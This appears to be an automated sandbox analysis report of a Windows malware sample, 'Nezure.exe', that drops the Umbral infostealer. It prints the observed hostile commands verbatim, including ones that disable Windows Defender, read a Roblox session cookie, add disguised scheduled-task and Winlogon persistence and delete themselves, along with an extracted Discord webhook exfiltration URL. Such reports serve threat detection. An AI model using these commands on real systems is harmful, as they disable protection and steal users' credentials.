Analysis
-
max time kernel
52s -
max time network
45s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-05-2024 21:52
Static task
static1
Behavioral task
behavioral1
Sample
Nezure.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
Nezure.exe
Resource
win11-20240419-en
General
-
Target
Nezure.exe
-
Size
8.3MB
-
MD5
4efce9b6099fa6bfc272b5e192fe16cc
-
SHA1
d5495d7d0593a0258bb50325eb0381cec5decd19
-
SHA256
185d297d3a204b586f262ce576bc40127b6ea49561b07c7e40c0a2e779df03e1
-
SHA512
0b81846c316c3790b1d3fd88953d7c9350443d8dd34cbf4311677e5706b59f4e8b0819186f7cb81b980bab88b9aa6802170536d50a989f081b0aacb68f58ca5f
-
SSDEEP
196608:UB4vMWmmF95vrRoypY2xNS+U1kYLLBGJt4qi5Wh4d3J4jtQG0gIe:UevBn5viETxNS+5OBU4hat0gI
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1244715424420069449/GTIFnC19DnPwT_RfLQ395m4ILCbNzqdjl2fE6jLwJomWdfGuqMipwhUem4c7oUOG5y7l
Signatures
-
Detect Umbral payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1108-34-0x0000023FBA770000-0x0000023FBA7B0000-memory.dmp family_umbral C:\Users\Admin\AppData\Local\Temp\Umbral.exe family_umbral -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\Videos\\MicrosoftSecurity.exe" Client.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops file in Drivers directory 1 IoCs
Processes:
Umbral.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Modifies AppInit DLL entries 2 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
Nezur.exeClient.exeUmbral.exepid process 2084 Nezur.exe 3284 Client.exe 1108 Umbral.exe -
Loads dropped DLL 14 IoCs
Processes:
WmiApSrv.exepid process 4580 1104 4092 832 2388 WmiApSrv.exe 3660 1644 4204 4808 1948 652 3060 4924 1572 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Chrome.exe" Client.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in Windows directory 1 IoCs
Processes:
Client.exedescription ioc process File created C:\Windows\xdwd.dll Client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3272 schtasks.exe 2600 schtasks.exe 3092 schtasks.exe 712 schtasks.exe 2400 schtasks.exe 1860 schtasks.exe 4696 schtasks.exe 1796 schtasks.exe 1640 schtasks.exe 1352 schtasks.exe 1968 schtasks.exe 780 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
Umbral.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeClient.exeWmiApSrv.exepid process 1108 Umbral.exe 4424 powershell.exe 4424 powershell.exe 728 powershell.exe 728 powershell.exe 2600 powershell.exe 2600 powershell.exe 4236 powershell.exe 4236 powershell.exe 2504 powershell.exe 2504 powershell.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 3284 Client.exe 2388 WmiApSrv.exe 2388 WmiApSrv.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Client.exeUmbral.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 3284 Client.exe Token: SeDebugPrivilege 1108 Umbral.exe Token: SeIncreaseQuotaPrivilege 2500 wmic.exe Token: SeSecurityPrivilege 2500 wmic.exe Token: SeTakeOwnershipPrivilege 2500 wmic.exe Token: SeLoadDriverPrivilege 2500 wmic.exe Token: SeSystemProfilePrivilege 2500 wmic.exe Token: SeSystemtimePrivilege 2500 wmic.exe Token: SeProfSingleProcessPrivilege 2500 wmic.exe Token: SeIncBasePriorityPrivilege 2500 wmic.exe Token: SeCreatePagefilePrivilege 2500 wmic.exe Token: SeBackupPrivilege 2500 wmic.exe Token: SeRestorePrivilege 2500 wmic.exe Token: SeShutdownPrivilege 2500 wmic.exe Token: SeDebugPrivilege 2500 wmic.exe Token: SeSystemEnvironmentPrivilege 2500 wmic.exe Token: SeRemoteShutdownPrivilege 2500 wmic.exe Token: SeUndockPrivilege 2500 wmic.exe Token: SeManageVolumePrivilege 2500 wmic.exe Token: 33 2500 wmic.exe Token: 34 2500 wmic.exe Token: 35 2500 wmic.exe Token: 36 2500 wmic.exe Token: SeIncreaseQuotaPrivilege 2500 wmic.exe Token: SeSecurityPrivilege 2500 wmic.exe Token: SeTakeOwnershipPrivilege 2500 wmic.exe Token: SeLoadDriverPrivilege 2500 wmic.exe Token: SeSystemProfilePrivilege 2500 wmic.exe Token: SeSystemtimePrivilege 2500 wmic.exe Token: SeProfSingleProcessPrivilege 2500 wmic.exe Token: SeIncBasePriorityPrivilege 2500 wmic.exe Token: SeCreatePagefilePrivilege 2500 wmic.exe Token: SeBackupPrivilege 2500 wmic.exe Token: SeRestorePrivilege 2500 wmic.exe Token: SeShutdownPrivilege 2500 wmic.exe Token: SeDebugPrivilege 2500 wmic.exe Token: SeSystemEnvironmentPrivilege 2500 wmic.exe Token: SeRemoteShutdownPrivilege 2500 wmic.exe Token: SeUndockPrivilege 2500 wmic.exe Token: SeManageVolumePrivilege 2500 wmic.exe Token: 33 2500 wmic.exe Token: 34 2500 wmic.exe Token: 35 2500 wmic.exe Token: 36 2500 wmic.exe Token: SeDebugPrivilege 4424 powershell.exe Token: SeDebugPrivilege 728 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeIncreaseQuotaPrivilege 3488 wmic.exe Token: SeSecurityPrivilege 3488 wmic.exe Token: SeTakeOwnershipPrivilege 3488 wmic.exe Token: SeLoadDriverPrivilege 3488 wmic.exe Token: SeSystemProfilePrivilege 3488 wmic.exe Token: SeSystemtimePrivilege 3488 wmic.exe Token: SeProfSingleProcessPrivilege 3488 wmic.exe Token: SeIncBasePriorityPrivilege 3488 wmic.exe Token: SeCreatePagefilePrivilege 3488 wmic.exe Token: SeBackupPrivilege 3488 wmic.exe Token: SeRestorePrivilege 3488 wmic.exe Token: SeShutdownPrivilege 3488 wmic.exe Token: SeDebugPrivilege 3488 wmic.exe Token: SeSystemEnvironmentPrivilege 3488 wmic.exe Token: SeRemoteShutdownPrivilege 3488 wmic.exe Token: SeUndockPrivilege 3488 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Nezure.exeUmbral.execmd.exeClient.exeCMD.exeCMD.exeCMD.exeCMD.exeCMD.exeCMD.exeCMD.exeCMD.exedescription pid process target process PID 3844 wrote to memory of 2084 3844 Nezure.exe Nezur.exe PID 3844 wrote to memory of 2084 3844 Nezure.exe Nezur.exe PID 3844 wrote to memory of 3284 3844 Nezure.exe Client.exe PID 3844 wrote to memory of 3284 3844 Nezure.exe Client.exe PID 3844 wrote to memory of 1108 3844 Nezure.exe Umbral.exe PID 3844 wrote to memory of 1108 3844 Nezure.exe Umbral.exe PID 1108 wrote to memory of 2500 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 2500 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 4628 1108 Umbral.exe attrib.exe PID 1108 wrote to memory of 4628 1108 Umbral.exe attrib.exe PID 1108 wrote to memory of 4424 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 4424 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 728 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 728 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 2600 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 2600 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 4236 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 4236 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 3488 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 3488 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 1664 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 1664 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 3956 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 3956 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 2504 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 2504 1108 Umbral.exe powershell.exe PID 1108 wrote to memory of 4648 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 4648 1108 Umbral.exe wmic.exe PID 1108 wrote to memory of 4636 1108 Umbral.exe cmd.exe PID 1108 wrote to memory of 4636 1108 Umbral.exe cmd.exe PID 4636 wrote to memory of 2068 4636 cmd.exe PING.EXE PID 4636 wrote to memory of 2068 4636 cmd.exe PING.EXE PID 3284 wrote to memory of 240 3284 Client.exe CMD.exe PID 3284 wrote to memory of 240 3284 Client.exe CMD.exe PID 240 wrote to memory of 712 240 CMD.exe schtasks.exe PID 240 wrote to memory of 712 240 CMD.exe schtasks.exe PID 3284 wrote to memory of 2636 3284 Client.exe CMD.exe PID 3284 wrote to memory of 2636 3284 Client.exe CMD.exe PID 2636 wrote to memory of 2400 2636 CMD.exe schtasks.exe PID 2636 wrote to memory of 2400 2636 CMD.exe schtasks.exe PID 3284 wrote to memory of 780 3284 Client.exe CMD.exe PID 3284 wrote to memory of 780 3284 Client.exe CMD.exe PID 780 wrote to memory of 1860 780 CMD.exe schtasks.exe PID 780 wrote to memory of 1860 780 CMD.exe schtasks.exe PID 3284 wrote to memory of 776 3284 Client.exe CMD.exe PID 3284 wrote to memory of 776 3284 Client.exe CMD.exe PID 776 wrote to memory of 4696 776 CMD.exe schtasks.exe PID 776 wrote to memory of 4696 776 CMD.exe schtasks.exe PID 3284 wrote to memory of 4444 3284 Client.exe CMD.exe PID 3284 wrote to memory of 4444 3284 Client.exe CMD.exe PID 4444 wrote to memory of 1796 4444 CMD.exe schtasks.exe PID 4444 wrote to memory of 1796 4444 CMD.exe schtasks.exe PID 3284 wrote to memory of 2944 3284 Client.exe CMD.exe PID 3284 wrote to memory of 2944 3284 Client.exe CMD.exe PID 2944 wrote to memory of 3272 2944 CMD.exe schtasks.exe PID 2944 wrote to memory of 3272 2944 CMD.exe schtasks.exe PID 3284 wrote to memory of 3416 3284 Client.exe CMD.exe PID 3284 wrote to memory of 3416 3284 Client.exe CMD.exe PID 3416 wrote to memory of 2600 3416 CMD.exe schtasks.exe PID 3416 wrote to memory of 2600 3416 CMD.exe schtasks.exe PID 3284 wrote to memory of 2336 3284 Client.exe CMD.exe PID 3284 wrote to memory of 2336 3284 Client.exe CMD.exe PID 2336 wrote to memory of 3092 2336 CMD.exe schtasks.exe PID 2336 wrote to memory of 3092 2336 CMD.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nezure.exe"C:\Users\Admin\AppData\Local\Temp\Nezure.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Nezur.exe"C:\Users\Admin\AppData\Local\Temp\Nezur.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit3⤵
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b2f8b5bf54e10ae4d93a2eac002cb497
SHA1eccc3cd33596075bf413e4249c1f2491b1b2a6c7
SHA25644e6afcd4b56b7cbc81c4ce55e62b7ae6f8d44948f2b9cc9a6ee9a9adfdce02d
SHA51258c5911a9b98b94909e627f498f839a55383aa213afd9a837ed1f8543198a79a856baa02373f948bfbb0cfd149e7962e2356cdad6695dc6411840faa09700686
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD505b3cd21c1ec02f04caba773186ee8d0
SHA139e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD587ebe221d639e66210ef10c93e5f83c3
SHA1483a666b82f7b59e2d569f6f331fa3989fe0f526
SHA2569a41c90023823aa68dc48f5d8592910dc2ad1116bf54870a0832aba787990380
SHA5122a1e22894388a79526f39db4fa7c65db92626719337f865eaac39d0bb28dc95726fba62c1f0d659864843a2804bd803fe3dfbc0840421c80ff735192928efcce
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57332074ae2b01262736b6fbd9e100dac
SHA122f992165065107cc9417fa4117240d84414a13c
SHA256baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA5124ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2
-
C:\Users\Admin\AppData\Local\Temp\Client.exeFilesize
578KB
MD51984de1def2a649295eb4683cef7b145
SHA1b3772c1d98f1d18bafd8cf4781f65fc17f20811a
SHA256ad1ca0ede87c65ab25cca6d7899da474b27ee5631e55c21120e857d16b9802b2
SHA5128b64bec1f124bfe5df9e3b8f7fcae5921836604c67e537445c48bcc2b7ac0b71d00fc7c8f8609799577bce4cdf24bed38eb0c23bb537881c74216f416a665a65
-
C:\Users\Admin\AppData\Local\Temp\Nezur.exeFilesize
7.9MB
MD5754c5ad19cb3bc21a58bccf028bc2b86
SHA166fe0f66d80023b347707248abe6e44e5f9d98ce
SHA2568445e6223a5f1b7f33b0320560b34139ab758006ed4492f581e2b90d3e104f5b
SHA512fdbbfbc10c58e909da664e643bffbe640b4b3242df0da2d5bd40d9691f96ce6cca4c27e166dff7e290b3a5f012b0a3e135e1650bf61a7484253c59cc54177790
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exeFilesize
230KB
MD59e9bbff99af7ac67d8bd79f854bd569c
SHA1cce432ed7fc4aa23daf8311e2ef3ea2f056c1ca6
SHA256e0465af4219a63f50e3a44f579d27dc9a0188797faf7f614b5f2ecc1d899a24c
SHA5127b70e1cd5b900aa16894c5cd13925f799d59e11fc3113adeeaf4d770e27b4088546f8e21c674d3aed3c13ccc06c04c22a2d54c8286dda28fee77fd0fd1a870b8
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjlebmfj.0m2.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\xdwd.dllFilesize
136KB
MD516e5a492c9c6ae34c59683be9c51fa31
SHA197031b41f5c56f371c28ae0d62a2df7d585adaba
SHA25635c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA51220fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6
-
memory/1108-64-0x0000023FD5010000-0x0000023FD5060000-memory.dmpFilesize
320KB
-
memory/1108-99-0x0000023FD4F30000-0x0000023FD4F3A000-memory.dmpFilesize
40KB
-
memory/1108-100-0x0000023FD4F60000-0x0000023FD4F72000-memory.dmpFilesize
72KB
-
memory/1108-34-0x0000023FBA770000-0x0000023FBA7B0000-memory.dmpFilesize
256KB
-
memory/1108-65-0x0000023FD4F10000-0x0000023FD4F2E000-memory.dmpFilesize
120KB
-
memory/1108-63-0x0000023FD4F90000-0x0000023FD5006000-memory.dmpFilesize
472KB
-
memory/2084-35-0x00007FF6AE080000-0x00007FF6AF3D9000-memory.dmpFilesize
19.3MB
-
memory/3284-38-0x00007FF830B90000-0x00007FF831652000-memory.dmpFilesize
10.8MB
-
memory/3284-31-0x0000000000A30000-0x0000000000AC6000-memory.dmpFilesize
600KB
-
memory/3284-191-0x0000000002B90000-0x0000000002B9C000-memory.dmpFilesize
48KB
-
memory/3284-223-0x00007FF830B90000-0x00007FF831652000-memory.dmpFilesize
10.8MB
-
memory/3844-36-0x00007FF830B90000-0x00007FF831652000-memory.dmpFilesize
10.8MB
-
memory/3844-0-0x00007FF830B93000-0x00007FF830B95000-memory.dmpFilesize
8KB
-
memory/3844-3-0x00007FF830B90000-0x00007FF831652000-memory.dmpFilesize
10.8MB
-
memory/3844-1-0x0000000000B00000-0x000000000134C000-memory.dmpFilesize
8.3MB
-
memory/4424-39-0x000001B4A4850000-0x000001B4A4872000-memory.dmpFilesize
136KB